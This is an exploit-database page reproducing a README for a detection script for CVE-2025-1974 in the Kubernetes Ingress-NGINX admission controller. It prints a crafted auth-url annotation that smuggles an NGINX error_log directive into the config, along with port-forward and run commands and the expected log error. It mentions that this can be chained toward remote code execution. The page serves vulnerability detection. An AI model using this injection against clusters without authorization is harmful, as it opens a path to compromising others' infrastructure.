Exploit for CVE-2025-1974

Name: Exploit for CVE-2025-1974
Rating: 5 (101 reviews)
2025-03-27 | CVSS 9.8
## https://sploitus.com/exploit?id=BE613A1F-5673-5A94-8EA0-39AA37E2CAC5
# 🚨 Log Injection Test via Ingress-NGINX Admission Controller

## 🧠 Overview
This script tests for annotation injection vulnerabilities in Kubernetes clusters using the NGINX Ingress Controller. It is meant for **detection purposes only** in relation to [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974), which allows malicious annotations to influence NGINX configuration.

## 📚 Background
The vulnerability, disclosed by Wiz.io ([blog post](https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities)), involves injecting annotations that are improperly handled by the controller. For instance:

```yaml
nginx.ingress.kubernetes.io/auth-url: "http://placeholder/#; error_log /root/this_path_shouldnt_exist.log debug; #"
```

This can lead to unexpected NGINX configuration behavior and permission errors if processed. In more advanced scenarios, this type of injection could be chained with other misconfigurations to achieve **remote code execution (RCE)**.

## 🛠️ What This Script Does
1. Loads a crafted `AdmissionReview` payload from a YAML file.
2. Sends it to the admission controller's `/validate` endpoint.
3. Prompts the user to check ingress controller logs for results.

## 📁 Files
- `admission_review.yaml`: Contains the crafted AdmissionReview request.
- `main.py`: Sends the payload to the controller.

## 🚀 Usage
First, forward the admission controller port:

```bash
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443
```

Then run:

```bash
python main.py --url https://localhost:8443
```

## 🔍 Expected Result
Check ingress controller logs:

```bash
kubectl logs -n ingress-nginx -l app.kubernetes.io/component=controller
```

You may see:
```
nginx: [emerg] open() "/root/this_path_shouldnt_exist.log" failed (13: Permission denied)
```

This indicates the annotation was improperly executed as a directive.

## ⚠️ Warning
For **educational and authorized testing only**. Do not run on systems without permission.

## 🔗 References
- [Wiz Blog: Breaking Ingress NGINX](https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities)
- [NGINX Ingress Annotations](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/)
- [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)

---
Use this tool to verify whether your cluster is vulnerable to annotation injection via NGINX Ingress. Exploitation of this vulnerability may be part of a broader attack chain leading to remote code execution.